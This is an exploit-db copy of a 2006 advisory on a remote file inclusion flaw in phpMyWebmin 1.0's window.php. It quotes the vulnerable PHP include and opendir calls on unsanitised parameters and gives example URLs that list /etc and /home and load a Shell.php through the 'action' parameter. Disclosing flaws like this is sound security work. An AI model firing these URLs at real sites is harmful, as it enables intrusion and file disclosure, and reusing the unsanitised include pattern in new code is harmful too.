Lucene search

K
exploitdbKernel-32EDB-ID:2451
HistorySep 28, 2006 - 12:00 a.m.

phpMyWebmin 1.0 - 'window.php' Remote File Inclusion

2006-09-2800:00:00
Kernel-32
www.exploit-db.com
27

AI Score

7.4

Confidence

Low

#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File:window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php

# milw0rm.com [2006-09-28]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2451